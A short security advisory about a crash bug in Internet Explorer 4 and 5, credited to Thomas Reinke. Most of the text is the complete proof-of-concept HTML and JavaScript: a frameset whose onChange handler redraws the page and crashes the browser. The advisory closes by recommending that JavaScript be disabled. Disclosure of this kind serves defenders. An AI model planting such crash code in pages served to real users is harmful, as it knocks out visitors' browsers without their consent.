COMMAND
Internet Explorer
SYSTEMS AFFECTED
IE 4, 5
PROBLEM
Thomas Reinke found the following. It is possible to crash IE4/5
using a bit of dynamic HTML. The specifics of the setup are as
follows. A page uses frames to host JavaScript code on the main
page, and uses a "main" subframe to display rendered contents
calculated by the JavaScript code. In addition, the displayed
page has event handlers on various actions that could cause
the page to be redrawn by executing a function in the parent
frame. So, if we use an "onChange" event handler in a text input
box, and the user enters data and TABs out of the box, the
onChange event handler is invoked. If the event handler redraws
the page, IE will crash. Note that if you change the data and
then CLICK on the page, the event handler is also invoked and the
page is redrawn, but the browser does not crash. A working
version of the bug can be found at:
http://www.e-softinc.com/iebug_001.html
A copy of the HTML code is shown below. The bug has been tested
to work on Windows NT IE 5.00.2314.1003 and Windows 95 IE
4.72.3110.8.
<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript">
function blank() {
return "<HTML></HTML>"
}
function blank2() {
return "<HTML><BODY onload='parent.paintme()'></BODY></HTML>"
}
function paintme() {
main.document.write(rewrite());
main.document.close();
}
function rewrite() {
var ns = '<HTML> \r\n\
<HEAD> \r\n\
<title>Buy Investments</title> \r\n\
</HEAD> \r\n\
<BODY>\r\n\
To crash your browser (if you are running IE), enter a value in the\r\n\
first field and press <TAB> (which would normally move you to the\r\n\
second field).\r\n\
<P>\r\n\
<FORM name=dummy>\r\n\
<TABLE>\r\n\
<TR>\r\n\
<TD align=right>A text field</td>\r\n\
<TD><INPUT TYPE=text name=number onChange="parent.paintme()"></td>\r\n\
</TR>\r\n\
<TR>\r\n\
<TD align=right>A dummy field we want to tab to:</td>\r\n\
<TD><INPUT TYPE=text name=number2></td>\r\n\
</TR>\r\n\
</table>\r\n\
</FORM>\r\n\
</BODY>\r\n\
</HTML>'
return ns
}
</SCRIPT>
</HEAD>
<FRAMESET ROWS="1,*" FRAMEBORDER=0 FRAMESPACING=0>
<FRAME NAME="blank" SCROLLING=NO SRC="javascript:parent.blank()">
<FRAME NAME="main" SRC="javascript:parent.blank2()">
</FRAMESET>
</HTML>
SOLUTION
Disable JavaScript.